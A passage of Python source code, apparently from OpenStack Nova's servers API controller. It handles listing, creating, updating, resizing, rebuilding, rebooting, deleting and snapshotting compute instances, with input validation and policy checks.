'changes-since'\n # should return recently deleted images according to the API spec.\n\n if 'deleted' not in search_opts:\n if 'changes-since' not in search_opts:\n # No 'changes-since', so we only want non-deleted servers\n search_opts['deleted'] = False\n else:\n # Convert deleted filter value to a valid boolean.\n # Return non-deleted servers if an invalid value\n # is passed with deleted filter.\n search_opts['deleted'] = strutils.bool_from_string(\n search_opts['deleted'], default=False)\n\n if search_opts.get(\"vm_state\") == ['deleted']:\n if context.is_admin:\n search_opts['deleted'] = True\n else:\n msg = _(\"Only administrators may list deleted instances\")\n raise exc.HTTPForbidden(explanation=msg)\n\n all_tenants = common.is_all_tenants(search_opts)\n # use the boolean from here on out so remove the entry from search_opts\n # if it's present\n search_opts.pop('all_tenants', None)\n\n elevated = None\n if all_tenants:\n policy.enforce(context, 'compute:get_all_tenants',\n {'project_id': context.project_id,\n 'user_id': context.user_id})\n elevated = context.elevated()\n else:\n if context.project_id:\n search_opts['project_id'] = context.project_id\n else:\n search_opts['user_id'] = context.user_id\n\n limit, marker = common.get_limit_and_marker(req)\n # Sorting by multiple keys and directions is conditionally enabled\n sort_keys, sort_dirs = None, None\n if self.ext_mgr.is_loaded('os-server-sort-keys'):\n sort_keys, sort_dirs = common.get_sort_params(req.params)\n\n expected_attrs = None\n if is_detail:\n # merge our expected attrs with what the view builder needs for\n # showing details\n expected_attrs = self._view_builder.get_show_expected_attrs(\n expected_attrs)\n\n try:\n instance_list = self.compute_api.get_all(elevated or context,\n search_opts=search_opts, limit=limit, marker=marker,\n want_objects=True, expected_attrs=expected_attrs,\n sort_keys=sort_keys, sort_dirs=sort_dirs)\n except exception.MarkerNotFound:\n msg = _('marker [%s] not found') % marker\n raise exc.HTTPBadRequest(explanation=msg)\n except exception.FlavorNotFound:\n LOG.debug(\"Flavor '%s' could not be found\", search_opts['flavor'])\n instance_list = objects.InstanceList()\n\n if is_detail:\n instance_list._context = context\n instance_list.fill_faults()\n response = self._view_builder.detail(req, instance_list)\n else:\n response = self._view_builder.index(req, instance_list)\n req.cache_db_instances(instance_list)\n return response\n\n def _get_server(self, context, req, instance_uuid, is_detail=False):\n \"\"\"Utility function for looking up an instance by uuid.\n\n :param context: request context for auth\n :param req: HTTP request. The instance is cached in this request.\n :param instance_uuid: UUID of the server instance to get\n :param is_detail: True if you plan on showing the details of the\n instance in the response, False otherwise.\n \"\"\"\n expected_attrs = ['flavor']\n if is_detail:\n expected_attrs = self._view_builder.get_show_expected_attrs(\n expected_attrs)\n instance = common.get_instance(self.compute_api, context,\n instance_uuid,\n expected_attrs=expected_attrs)\n req.cache_db_instance(instance)\n return instance\n\n def _check_string_length(self, value, name, max_length=None):\n try:\n if isinstance(value, six.string_types):\n value = value.strip()\n utils.check_string_length(value, name, min_length=1,\n max_length=max_length)\n except exception.InvalidInput as e:\n raise exc.HTTPBadRequest(explanation=e.format_message())\n\n def _validate_server_name(self, value):\n self._check_string_length(value, 'Server name', max_length=255)\n\n def _get_injected_files(self, personality):\n \"\"\"Create a list of injected files from the personality attribute.\n\n At this time, injected_files must be formatted as a list of\n (file_path, file_content) pairs for compatibility with the\n underlying compute service.\n \"\"\"\n injected_files = []\n\n for item in personality:\n try:\n path = item['path']\n contents = item['contents']\n except KeyError as key:\n expl = _('Bad personality format: missing %s') % key\n raise exc.HTTPBadRequest(explanation=expl)\n except TypeError:\n expl = _('Bad personality format')\n raise exc.HTTPBadRequest(explanation=expl)\n if self._decode_base64(contents) is None:\n expl = _('Personality content for %s cannot be decoded') % path\n raise exc.HTTPBadRequest(explanation=expl)\n injected_files.append((path, contents))\n return injected_files\n\n def _get_requested_networks(self, requested_networks):\n \"\"\"Create a list of requested networks from the networks attribute.\"\"\"\n networks = []\n network_uuids = []\n for network in requested_networks:\n request = objects.NetworkRequest()\n try:\n try:\n request.port_id = network.get('port', None)\n except ValueError:\n msg = _(\"Bad port format: port uuid is \"\n \"not in proper format \"\n \"(%s)\") % network.get('port')\n raise exc.HTTPBadRequest(explanation=msg)\n if request.port_id:\n request.network_id = None\n if not utils.is_neutron():\n # port parameter is only for neutron v2.0\n msg = _(\"Unknown argument : port\")\n raise exc.HTTPBadRequest(explanation=msg)\n else:\n request.network_id = network['uuid']\n\n if (not request.port_id and not\n uuidutils.is_uuid_like(request.network_id)):\n br_uuid = request.network_id.split('-', 1)[-1]\n if not uuidutils.is_uuid_like(br_uuid):\n msg = _(\"Bad networks format: network uuid is \"\n \"not in proper format \"\n \"(%s)\") % request.network_id\n raise exc.HTTPBadRequest(explanation=msg)\n\n # fixed IP address is optional\n # if the fixed IP address is not provided then\n # it will use one of the available IP address from the network\n try:\n request.address = network.get('fixed_ip', None)\n except ValueError:\n msg = (_(\"Invalid fixed IP address (%s)\") %\n network.get('fixed_ip'))\n raise exc.HTTPBadRequest(explanation=msg)\n\n # duplicate networks are allowed only for neutron v2.0\n if (not utils.is_neutron() and request.network_id and\n request.network_id in network_uuids):\n expl = (_(\"Duplicate networks\"\n \" (%s) are not allowed\") %\n request.network_id)\n raise exc.HTTPBadRequest(explanation=expl)\n network_uuids.append(request.network_id)\n networks.append(request)\n except KeyError as key:\n expl = _('Bad network format: missing %s') % key\n raise exc.HTTPBadRequest(explanation=expl)\n except TypeError:\n expl = _('Bad networks format')\n raise exc.HTTPBadRequest(explanation=expl)\n\n return objects.NetworkRequestList(objects=networks)\n\n # NOTE(vish): Without this regex, b64decode will happily\n # ignore illegal bytes in the base64 encoded\n # data.\n B64_REGEX = re.compile('^(?:[A-Za-z0-9+\\/]{4})*'\n '(?:[A-Za-z0-9+\\/]{2}=='\n '|[A-Za-z0-9+\\/]{3}=)?$')\n\n def _decode_base64(self, data):\n if isinstance(data, six.binary_type) and hasattr(data, \"decode\"):\n try:\n data = data.decode(\"utf-8\")\n except UnicodeDecodeError:\n return None\n data = re.sub(r'\\s', '', data)\n if not self.B64_REGEX.match(data):\n return None\n try:\n return base64.b64decode(data)\n except TypeError:\n return None\n\n def _validate_access_ipv4(self, address):\n if not netutils.is_valid_ipv4(address):\n expl = _('accessIPv4 is not proper IPv4 format')\n raise exc.HTTPBadRequest(explanation=expl)\n\n def _validate_access_ipv6(self, address):\n if not netutils.is_valid_ipv6(address):\n expl = _('accessIPv6 is not proper IPv6 format')\n raise exc.HTTPBadRequest(explanation=expl)\n\n def show(self, req, id):\n \"\"\"Returns server details by server id.\"\"\"\n context = req.environ['nova.context']\n instance = self._get_server(context, req, id, is_detail=True)\n return self._view_builder.show(req, instance)\n\n def _extract(self, server_dict, ext_name, key):\n if self.ext_mgr.is_loaded(ext_name):\n return server_dict.get(key)\n return None\n\n def _validate_user_data(self, user_data):\n if user_data and self._decode_base64(user_data) is None:\n expl = _('Userdata content cannot be decoded')\n raise exc.HTTPBadRequest(explanation=expl)\n return user_data\n\n def _extract_bdm(self, server_dict, image_uuid_specified):\n legacy_bdm = True\n block_device_mapping_v2 = None\n if not self.ext_mgr.is_loaded('os-volumes'):\n return legacy_bdm, None\n block_device_mapping = server_dict.get('block_device_mapping', [])\n if not isinstance(block_device_mapping, list):\n msg = _('block_device_mapping must be a list')\n raise exc.HTTPBadRequest(explanation=msg)\n for bdm in block_device_mapping:\n try:\n block_device.validate_device_name(bdm.get(\"device_name\"))\n block_device.validate_and_default_volume_size(bdm)\n except exception.InvalidBDMFormat as e:\n raise exc.HTTPBadRequest(explanation=e.format_message())\n\n if 'delete_on_termination' in bdm:\n bdm['delete_on_termination'] = strutils.bool_from_string(\n bdm['delete_on_termination'])\n\n if self.ext_mgr.is_loaded('os-block-device-mapping-v2-boot'):\n # Consider the new data format for block device mapping\n block_device_mapping_v2 = server_dict.get(\n 'block_device_mapping_v2', [])\n # NOTE (ndipanov): Disable usage of both legacy and new\n # block device format in the same request\n if block_device_mapping and block_device_mapping_v2:\n expl = _('Using different block_device_mapping syntaxes '\n 'is not allowed in the same request.')\n raise exc.HTTPBadRequest(explanation=expl)\n\n if not isinstance(block_device_mapping_v2, list):\n msg = _('block_device_mapping_v2 must be a list')\n raise exc.HTTPBadRequest(explanation=msg)\n\n # Assume legacy format\n legacy_bdm = not bool(block_device_mapping_v2)\n\n try:\n block_device_mapping_v2 = [\n block_device.BlockDeviceDict.from_api(bdm_dict,\n image_uuid_specified)\n for bdm_dict in block_device_mapping_v2]\n except exception.InvalidBDMFormat as e:\n raise exc.HTTPBadRequest(explanation=e.format_message())\n\n bdm = (block_device_mapping or block_device_mapping_v2)\n return legacy_bdm, bdm\n\n @staticmethod\n def _resolve_exception(matches):\n \"\"\"We want the most specific exception class.\"\"\"\n while len(matches) > 1:\n first = matches[0]\n second = matches[1]\n if issubclass(first, second):\n del matches[1]\n else:\n del matches[0]\n return matches[0]\n\n @staticmethod\n def _handle_create_exception(*exc_info):\n \"\"\"The `CREATE_EXCEPTIONS` dict containing the relationships between\n the nova exceptions and the webob exception classes to be raised is\n defined at the top of this file.\n \"\"\"\n error = exc_info[1]\n err_cls = error.__class__\n cls_to_raise = CREATE_EXCEPTIONS.get(err_cls)\n if cls_to_raise is None:\n # The error is a subclass of one of the dict keys\n to_raise = [val for key, val in CREATE_EXCEPTIONS.items()\n if isinstance(error, key)]\n if len(to_raise) > 1:\n cls_to_raise = Controller._resolve_exception(to_raise)\n elif not to_raise:\n # Not any of the expected exceptions, so re-raise\n six.reraise(*exc_info)\n else:\n cls_to_raise = to_raise[0]\n\n for key, val in CREATE_EXCEPTIONS_MSGS.items():\n if isinstance(error, key):\n raise cls_to_raise(explanation=CREATE_EXCEPTIONS_MSGS[key])\n raise cls_to_raise(explanation=error.format_message())\n\n def _determine_requested_networks(self, server_dict):\n requested_networks = None\n if (self.ext_mgr.is_loaded('os-networks')\n or utils.is_neutron()):\n requested_networks = server_dict.get('networks')\n\n if requested_networks is not None:\n if not isinstance(requested_networks, list):\n expl = _('Bad networks format')\n raise exc.HTTPBadRequest(explanation=expl)\n requested_networks = self._get_requested_networks(\n requested_networks)\n return requested_networks\n\n @wsgi.response(202)\n def create(self, req, body):\n \"\"\"Creates a new server for a given user.\"\"\"\n if not self.is_valid_body(body, 'server'):\n raise exc.HTTPUnprocessableEntity()\n\n context = req.environ['nova.context']\n server_dict = body['server']\n password = self._get_server_admin_password(server_dict)\n\n if 'name' not in server_dict:\n msg = _(\"Server name is not defined\")\n raise exc.HTTPBadRequest(explanation=msg)\n\n name = server_dict['name']\n self._validate_server_name(name)\n name = name.strip()\n\n image_uuid = self._image_from_req_data(body)\n\n personality = server_dict.get('personality')\n config_drive = None\n if self.ext_mgr.is_loaded('os-config-drive'):\n config_drive = server_dict.get('config_drive')\n\n injected_files = []\n if personality:\n injected_files = self._get_injected_files(personality)\n\n sg_names = []\n if self.ext_mgr.is_loaded('os-security-groups'):\n security_groups = server_dict.get('security_groups')\n if security_groups is not None:\n try:\n sg_names = [sg['name'] for sg in security_groups\n if sg.get('name')]\n except AttributeError:\n msg = _(\"Invalid input for field/attribute %(path)s.\"\n \" Value: %(value)s. %(message)s\") % {\n 'path': 'security_groups',\n 'value': security_groups,\n 'message': ''\n }\n raise exc.HTTPBadRequest(explanation=msg)\n if not sg_names:\n sg_names.append('default')\n\n sg_names = list(set(sg_names))\n\n requested_networks = self._determine_requested_networks(server_dict)\n\n (access_ip_v4, ) = server_dict.get('accessIPv4'),\n if access_ip_v4 is not None:\n self._validate_access_ipv4(access_ip_v4)\n\n (access_ip_v6, ) = server_dict.get('accessIPv6'),\n if access_ip_v6 is not None:\n self._validate_access_ipv6(access_ip_v6)\n\n flavor_id = self._flavor_id_from_req_data(body)\n\n # optional openstack extensions:\n key_name = self._extract(server_dict, 'os-keypairs', 'key_name')\n availability_zone = self._extract(server_dict, 'os-availability-zone',\n 'availability_zone')\n user_data = self._extract(server_dict, 'os-user-data', 'user_data')\n self._validate_user_data(user_data)\n\n image_uuid_specified = bool(image_uuid)\n legacy_bdm, block_device_mapping = self._extract_bdm(server_dict,\n image_uuid_specified)\n\n ret_resv_id = False\n # min_count and max_count are optional. If they exist, they may come\n # in as strings. Verify that they are valid integers and > 0.\n # Also, we want to default 'min_count' to 1, and default\n # 'max_count' to be 'min_count'.\n min_count = 1\n max_count = 1\n if self.ext_mgr.is_loaded('os-multiple-create'):\n ret_resv_id = server_dict.get('return_reservation_id', False)\n min_count = server_dict.get('min_count', 1)\n max_count = server_dict.get('max_count', min_count)\n\n try:\n min_count = utils.validate_integer(\n min_count, \"min_count\", min_value=1)\n max_count = utils.validate_integer(\n max_count, \"max_count\", min_value=1)\n except exception.InvalidInput as e:\n raise exc.HTTPBadRequest(explanation=e.format_message())\n\n if min_count > max_count:\n msg = _('min_count must be <= max_count')\n raise exc.HTTPBadRequest(explanation=msg)\n\n auto_disk_config = False\n if self.ext_mgr.is_loaded('OS-DCF'):\n auto_disk_config = server_dict.get('auto_disk_config')\n\n scheduler_hints = {}\n if self.ext_mgr.is_loaded('OS-SCH-HNT'):\n scheduler_hints = server_dict.get('scheduler_hints', {})\n parse_az = self.compute_api.parse_availability_zone\n availability_zone, host, node = parse_az(context, availability_zone)\n\n check_server_group_quota = self.ext_mgr.is_loaded(\n 'os-server-group-quotas')\n try:\n _get_inst_type = flavors.get_flavor_by_flavor_id\n inst_type = _get_inst_type(flavor_id, ctxt=context,\n read_deleted=\"no\")\n\n (instances, resv_id) = self.compute_api.create(context,\n inst_type,\n image_uuid,\n display_name=name,\n display_description=name,\n key_name=key_name,\n metadata=server_dict.get('metadata', {}),\n access_ip_v4=access_ip_v4,\n access_ip_v6=access_ip_v6,\n injected_files=injected_files,\n admin_password=password,\n min_count=min_count,\n max_count=max_count,\n requested_networks=requested_networks,\n security_group=sg_names,\n user_data=user_data,\n availability_zone=availability_zone,\n forced_host=host, forced_node=node,\n config_drive=config_drive,\n block_device_mapping=block_device_mapping,\n auto_disk_config=auto_disk_config,\n scheduler_hints=scheduler_hints,\n legacy_bdm=legacy_bdm,\n check_server_group_quota=check_server_group_quota)\n except (exception.QuotaError,\n exception.PortLimitExceeded) as error:\n raise exc.HTTPForbidden(\n explanation=error.format_message())\n except messaging.RemoteError as err:\n msg = \"%(err_type)s: %(err_msg)s\" % {'err_type': err.exc_type,\n 'err_msg': err.value}\n raise exc.HTTPBadRequest(explanation=msg)\n except UnicodeDecodeError as error:\n msg = \"UnicodeError: %s\" % error\n raise exc.HTTPBadRequest(explanation=msg)\n except Exception:\n # The remaining cases can be handled in a standard fashion.\n self._handle_create_exception(*sys.exc_info())\n\n # If the caller wanted a reservation_id, return it\n if ret_resv_id:\n return wsgi.ResponseObject({'reservation_id': resv_id})\n\n req.cache_db_instances(instances)\n server = self._view_builder.create(req, instances[0])\n\n if CONF.enable_instance_password:\n server['server']['adminPass'] = password\n\n robj = wsgi.ResponseObject(server)\n\n return self._add_location(robj)\n\n def _delete(self, context, req, instance_uuid):\n instance = self._get_server(context, req, instance_uuid)\n if CONF.reclaim_instance_interval:\n try:\n self.compute_api.soft_delete(context, instance)\n except exception.InstanceInvalidState:\n # Note(yufang521247): instance which has never been active\n # is not allowed to be soft_deleted. Thus we have to call\n # delete() to clean up the instance.\n self.compute_api.delete(context, instance)\n else:\n self.compute_api.delete(context, instance)\n\n def update(self, req, id, body):\n \"\"\"Update server then pass on to version-specific controller.\"\"\"\n if not self.is_valid_body(body, 'server'):\n raise exc.HTTPUnprocessableEntity()\n\n ctxt = req.environ['nova.context']\n update_dict = {}\n\n if 'name' in body['server']:\n name = body['server']['name']\n self._validate_server_name(name)\n update_dict['display_name'] = name.strip()\n\n if 'accessIPv4' in body['server']:\n access_ipv4 = body['server']['accessIPv4']\n if access_ipv4:\n self._validate_access_ipv4(access_ipv4)\n update_dict['access_ip_v4'] = (\n access_ipv4 and access_ipv4.strip() or None)\n\n if 'accessIPv6' in body['server']:\n access_ipv6 = body['server']['accessIPv6']\n if access_ipv6:\n self._validate_access_ipv6(access_ipv6)\n update_dict['access_ip_v6'] = (\n access_ipv6 and access_ipv6.strip() or None)\n\n if 'auto_disk_config' in body['server']:\n auto_disk_config = strutils.bool_from_string(\n body['server']['auto_disk_config'])\n update_dict['auto_disk_config'] = auto_disk_config\n\n if 'hostId' in body['server']:\n msg = _(\"HostId cannot be updated.\")\n raise exc.HTTPBadRequest(explanation=msg)\n\n if 'personality' in body['server']:\n msg = _(\"Personality cannot be updated.\")\n raise exc.HTTPBadRequest(explanation=msg)\n\n instance = self._get_server(ctxt, req, id, is_detail=True)\n try:\n policy.enforce(ctxt, 'compute:update', instance)\n instance.update(update_dict)\n # Note instance.save can throw a NotFound exception\n instance.save()\n except exception.NotFound:\n msg = _(\"Instance could not be found\")\n raise exc.HTTPNotFound(explanation=msg)\n\n return self._view_builder.show(req, instance)\n\n @wsgi.response(204)\n @wsgi.action('confirmResize')\n def _action_confirm_resize(self, req, id, body):\n context = req.environ['nova.context']\n instance = self._get_server(context, req, id)\n try:\n self.compute_api.confirm_resize(context, instance)\n except exception.MigrationNotFound:\n msg = _(\"Instance has not been resized.\")\n raise exc.HTTPBadRequest(explanation=msg)\n except exception.InstanceIsLocked as e:\n raise exc.HTTPConflict(explanation=e.format_message())\n except exception.InstanceInvalidState as state_error:\n common.raise_http_conflict_for_instance_invalid_state(state_error,\n 'confirmResize', id)\n\n @wsgi.response(202)\n @wsgi.action('revertResize')\n def _action_revert_resize(self, req, id, body):\n context = req.environ['nova.context']\n instance = self._get_server(context, req, id)\n try:\n self.compute_api.revert_resize(context, instance)\n except exception.MigrationNotFound:\n msg = _(\"Instance has not been resized.\")\n raise exc.HTTPBadRequest(explanation=msg)\n except exception.FlavorNotFound:\n msg = _(\"Flavor used by the instance could not be found.\")\n raise exc.HTTPBadRequest(explanation=msg)\n except exception.InstanceIsLocked as e:\n raise exc.HTTPConflict(explanation=e.format_message())\n except exception.InstanceInvalidState as state_error:\n common.raise_http_conflict_for_instance_invalid_state(state_error,\n 'revertResize', id)\n return webob.Response(status_int=202)\n\n @wsgi.response(202)\n @wsgi.action('reboot')\n def _action_reboot(self, req, id, body):\n if 'reboot' in body and 'type' in body['reboot']:\n if not isinstance(body['reboot']['type'], six.string_types):\n msg = _(\"Argument 'type' for reboot must be a string\")\n LOG.error(msg)\n raise exc.HTTPBadRequest(explanation=msg)\n valid_reboot_types = ['HARD', 'SOFT']\n reboot_type = body['reboot']['type'].upper()\n if not valid_reboot_types.count(reboot_type):\n msg = _(\"Argument 'type' for reboot is not HARD or SOFT\")\n LOG.error(msg)\n raise exc.HTTPBadRequest(explanation=msg)\n else:\n msg = _(\"Missing argument 'type' for reboot\")\n LOG.error(msg)\n raise exc.HTTPBadRequest(explanation=msg)\n\n context = req.environ['nova.context']\n instance = self._get_server(context, req, id)\n\n try:\n self.compute_api.reboot(context, instance, reboot_type)\n except exception.InstanceIsLocked as e:\n raise exc.HTTPConflict(explanation=e.format_message())\n except exception.InstanceInvalidState as state_error:\n common.raise_http_conflict_for_instance_invalid_state(state_error,\n 'reboot', id)\n return webob.Response(status_int=202)\n\n def _resize(self, req, instance_id, flavor_id, **kwargs):\n \"\"\"Begin the resize process with given instance/flavor.\"\"\"\n context = req.environ[\"nova.context\"]\n instance = self._get_server(context, req, instance_id)\n try:\n self.compute_api.resize(context, instance, flavor_id, **kwargs)\n except exception.QuotaError as error:\n raise exc.HTTPForbidden(\n explanation=error.format_message())\n except exception.FlavorNotFound:\n msg = _(\"Unable to locate requested flavor.\")\n raise exc.HTTPBadRequest(explanation=msg)\n except exception.CannotResizeToSameFlavor:\n msg = _(\"Resize requires a flavor change.\")\n raise exc.HTTPBadRequest(explanation=msg)\n except exception.CannotResizeDisk as e:\n raise exc.HTTPBadRequest(explanation=e.format_message())\n except exception.InstanceIsLocked as e:\n raise exc.HTTPConflict(explanation=e.format_message())\n except exception.InstanceInvalidState as state_error:\n common.raise_http_conflict_for_instance_invalid_state(state_error,\n 'resize', instance_id)\n except exception.ImageNotAuthorized:\n msg = _(\"You are not authorized to access the image \"\n \"the instance was started with.\")\n raise exc.HTTPUnauthorized(explanation=msg)\n except exception.ImageNotFound:\n msg = _(\"Image that the instance was started \"\n \"with could not be found.\")\n raise exc.HTTPBadRequest(explanation=msg)\n except (exception.NoValidHost,\n exception.AutoDiskConfigDisabledByImage) as e:\n raise exc.HTTPBadRequest(explanation=e.format_message())\n except exception.Invalid:\n msg = _(\"Invalid instance image.\")\n raise exc.HTTPBadRequest(explanation=msg)\n\n return webob.Response(status_int=202)\n\n @wsgi.response(204)\n def delete(self, req, id):\n \"\"\"Destroys a server.\"\"\"\n try:\n self._delete(req.environ['nova.context'], req, id)\n except exception.NotFound:\n msg = _(\"Instance could not be found\")\n raise exc.HTTPNotFound(explanation=msg)\n except exception.InstanceIsLocked as e:\n raise exc.HTTPConflict(explanation=e.format_message())\n except exception.InstanceInvalidState as state_error:\n common.raise_http_conflict_for_instance_invalid_state(state_error,\n 'delete', id)\n\n def _image_ref_from_req_data(self, data):\n try:\n return six.text_type(data['server']['imageRef'])\n except (TypeError, KeyError):\n msg = _(\"Missing imageRef attribute\")\n raise exc.HTTPBadRequest(explanation=msg)\n\n def _image_uuid_from_href(self, image_href):\n if not image_href:\n msg = _(\"Invalid imageRef provided.\")\n raise exc.HTTPBadRequest(explanation=msg)\n\n # If the image href was generated by nova api, strip image_href\n # down to an id and use the default glance connection params\n image_uuid = image_href.split('/').pop()\n\n if not uuidutils.is_uuid_like(image_uuid):\n msg = _(\"Invalid imageRef provided.\")\n raise exc.HTTPBadRequest(explanation=msg)\n\n return image_uuid\n\n def _image_from_req_data(self, data):\n \"\"\"Get image data from the request or raise appropriate\n exceptions\n\n If no image is supplied - checks to see if there is\n block devices set and proper extesions loaded.\n \"\"\"\n image_ref = data['server'].get('imageRef')\n bdm = data['server'].get('block_device_mapping')\n bdm_v2 = data['server'].get('block_device_mapping_v2')\n\n if (not image_ref and (\n (bdm and self.ext_mgr.is_loaded('os-volumes')) or\n (bdm_v2 and\n self.ext_mgr.is_loaded('os-block-device-mapping-v2-boot')))):\n return ''\n else:\n image_href = self._image_ref_from_req_data(data)\n image_uuid = self._image_uuid_from_href(image_href)\n return image_uuid\n\n def _flavor_id_from_req_data(self, data):\n try:\n flavor_ref = data['server']['flavorRef']\n except (TypeError, KeyError):\n msg = _(\"Missing flavorRef attribute\")\n raise exc.HTTPBadRequest(explanation=msg)\n try:\n return common.get_id_from_href(flavor_ref)\n except ValueError:\n msg = _(\"Invalid flavorRef provided.\")\n raise exc.HTTPBadRequest(explanation=msg)\n\n @wsgi.response(202)\n @wsgi.action('changePassword')\n def _action_change_password(self, req, id, body):\n context = req.environ['nova.context']\n if (not body.get('changePassword')\n or 'adminPass' not in body['changePassword']):\n msg = _(\"No adminPass was specified\")\n raise exc.HTTPBadRequest(explanation=msg)\n password = self._get_server_admin_password(body['changePassword'])\n\n server = self._get_server(context, req, id)\n try:\n self.compute_api.set_admin_password(context, server, password)\n except exception.InstancePasswordSetFailed as e:\n raise exc.HTTPConflict(explanation=e.format_message())\n except exception.InstanceInvalidState as e:\n raise common.raise_http_conflict_for_instance_invalid_state(\n e, 'changePassword', id)\n except NotImplementedError:\n msg = _(\"Unable to set password on instance\")\n raise exc.HTTPNotImplemented(explanation=msg)\n return webob.Response(status_int=202)\n\n def _validate_metadata(self, metadata):\n \"\"\"Ensure that we can work with the metadata given.\"\"\"\n try:\n six.iteritems(metadata)\n except AttributeError:\n msg = _(\"Unable to parse metadata key/value pairs.\")\n LOG.debug(msg)\n raise exc.HTTPBadRequest(explanation=msg)\n\n @wsgi.response(202)\n @wsgi.action('resize')\n def _action_resize(self, req, id, body):\n \"\"\"Resizes a given instance to the flavor size requested.\"\"\"\n try:\n flavor_ref = str(body[\"resize\"][\"flavorRef\"])\n if not flavor_ref:\n msg = _(\"Resize request has invalid 'flavorRef' attribute.\")\n raise exc.HTTPBadRequest(explanation=msg)\n except (KeyError, TypeError):\n msg = _(\"Resize requests require 'flavorRef' attribute.\")\n raise exc.HTTPBadRequest(explanation=msg)\n\n kwargs = {}\n if 'auto_disk_config' in body['resize']:\n kwargs['auto_disk_config'] = body['resize']['auto_disk_config']\n\n return self._resize(req, id, flavor_ref, **kwargs)\n\n @wsgi.response(202)\n @wsgi.action('rebuild')\n def _action_rebuild(self, req, id, body):\n \"\"\"Rebuild an instance with the given attributes.\"\"\"\n body = body['rebuild']\n\n try:\n image_href = body[\"imageRef\"]\n except (KeyError, TypeError):\n msg = _(\"Could not parse imageRef from request.\")\n raise exc.HTTPBadRequest(explanation=msg)\n\n image_href = self._image_uuid_from_href(image_href)\n\n password = self._get_server_admin_password(body)\n\n context = req.environ['nova.context']\n instance = self._get_server(context, req, id)\n\n attr_map = {\n 'personality': 'files_to_inject',\n 'name': 'display_name',\n 'accessIPv4': 'access_ip_v4',\n 'accessIPv6': 'access_ip_v6',\n 'metadata': 'metadata',\n 'auto_disk_config': 'auto_disk_config',\n }\n\n kwargs = {}\n\n # take the preserve_ephemeral value into account only when the\n # corresponding extension is active\n if (self.ext_mgr.is_loaded('os-preserve-ephemeral-rebuild')\n and 'preserve_ephemeral' in body):\n kwargs['preserve_ephemeral'] = strutils.bool_from_string(\n body['preserve_ephemeral'], strict=True)\n\n if 'accessIPv4' in body:\n self._validate_access_ipv4(body['accessIPv4'])\n\n if 'accessIPv6' in body:\n self._validate_access_ipv6(body['accessIPv6'])\n\n if 'name' in body:\n self._validate_server_name(body['name'])\n\n for request_attribute, instance_attribute in attr_map.items():\n try:\n kwargs[instance_attribute] = body[request_attribute]\n except (KeyError, TypeError):\n pass\n\n self._validate_metadata(kwargs.get('metadata', {}))\n\n if 'files_to_inject' in kwargs:\n personality = kwargs.pop('files_to_inject')\n files_to_inject = self._get_injected_files(personality)\n else:\n files_to_inject = None\n\n try:\n self.compute_api.rebuild(context,\n instance,\n image_href,\n password,\n files_to_inject=files_to_inject,\n **kwargs)\n except exception.InstanceIsLocked as e:\n raise exc.HTTPConflict(explanation=e.format_message())\n except exception.InstanceInvalidState as state_error:\n common.raise_http_conflict_for_instance_invalid_state(state_error,\n 'rebuild', id)\n except exception.InstanceNotFound:\n msg = _(\"Instance could not be found\")\n raise exc.HTTPNotFound(explanation=msg)\n except exception.InvalidMetadataSize as error:\n raise exc.HTTPRequestEntityTooLarge(\n explanation=error.format_message())\n except exception.ImageNotFound:\n msg = _(\"Cannot find image for rebuild\")\n raise exc.HTTPBadRequest(explanation=msg)\n except exception.QuotaError as error:\n raise exc.HTTPForbidden(explanation=error.format_message())\n except (exception.ImageNotActive,\n exception.FlavorDiskTooSmall,\n exception.FlavorMemoryTooSmall,\n exception.InvalidMetadata,\n exception.AutoDiskConfigDisabledByImage) as error:\n raise exc.HTTPBadRequest(explanation=error.format_message())\n\n instance = self._get_server(context, req, id, is_detail=True)\n\n view = self._view_builder.show(req, instance)\n\n # Add on the adminPass attribute since the view doesn't do it\n # unless instance passwords are disabled\n if CONF.enable_instance_password:\n view['server']['adminPass'] = password\n\n robj = wsgi.ResponseObject(view)\n return self._add_location(robj)\n\n @wsgi.response(202)\n @wsgi.action('createImage')\n @common.check_snapshots_enabled\n def _action_create_image(self, req, id, body):\n \"\"\"Snapshot a server instance.\"\"\"\n context = req.environ['nova.context']\n entity = body.get(\"createImage\", {})\n\n image_name = entity.get(\"name\")\n\n if not image_name:\n msg = _(\"createImage entity requires name attribute\")\n raise exc.HTTPBadRequest(explanation=msg)\n\n props = {}\n metadata = entity.get('metadata', {})\n common.check_img_metadata_properties_quota(context, metadata)\n try:\n props.update(metadata)\n except ValueError:\n msg = _(\"Invalid metadata\")\n raise exc.HTTPBadRequest(explanation=msg)\n\n instance = self._get_server(context, req, id)\n\n bdms = objects.BlockDeviceMappingList.get_by_instance_uuid(\n context, instance.uuid)\n\n try:\n if self.compute_api.is_volume_backed_instance(context, instance,\n bdms):\n policy.enforce(context,\n 'compute:snapshot_volume_backed',\n {'project_id': context.project_id,\n 'user_id': context.user_id})\n image = self.compute_api.snapshot_volume_backed(\n context,\n instance,\n image_name,\n extra_properties=props)\n else:\n image = self.compute_api.snapshot(context,\n instance,\n image_name,\n extra_properties=props)\n except exception.InstanceInvalidState as state_error:\n common.raise_http_conflict_for_instance_invalid_state(state_error,\n 'createImage', id)\n except exception.Invalid as err:\n raise exc.HTTPBadRequest(explanation=err.format_message())\n\n # build location of newly-created image entity\n image_id = str(image['id'])\n url_prefix = self._view_builder._update_glance_link_prefix(\n req.application_url)\n image_ref = common.url_join(url_prefix,\n context.project_id,\n 'images',\n image_id)\n\n resp = webob.Response(status_int=202)\n resp.headers['Location'] = image_ref\n return resp\n\n def _get_server_admin_password(self, server):\n \"\"\"Determine the admin password for a server on creation.\"\"\"\n try:\n password = server['adminPass']\n self._validate_admin_password(password)\n except KeyError:\n password = utils.generate_password()\n except ValueError:\n raise exc.HTTPBadRequest(explanation=_(\"Invalid adminPass\"))\n\n return password\n\n def _validate_admin_password(self, password):\n if not isinstance(password, six.string_types):\n raise ValueError()\n\n def _get_server_search_options(self):\n \"\"\"Return server search options allowed by non-admin.\"\"\"\n return ('reservation_id', 'name', 'status', 'image', 'flavor',\n 'ip', 'changes-since', 'all_tenants')\n\n\ndef create_resource(ext_mgr):\n return wsgi.Resource(Controller(ext_mgr))\n\n\ndef remove_invalid_options(context, search_options, allowed_search_options):\n \"\"\"Remove search options that are not valid for non-admin API/context.\"\"\"\n if context.is_admin:\n # Only remove parameters for sorting and pagination\n for key in ('sort_key', 'sort_dir', 'limit', 'marker'):\n search_options.pop(key, None)\n return\n # Otherwise, strip out all unknown options\n unknown_options = [opt for opt in search_options\n if opt not in allowed_search_options]\n LOG.debug(\"Removing options '%s' from query\",\n \", \".join(unknown_options))\n for opt in unknown_options:\n search_options.pop(opt, 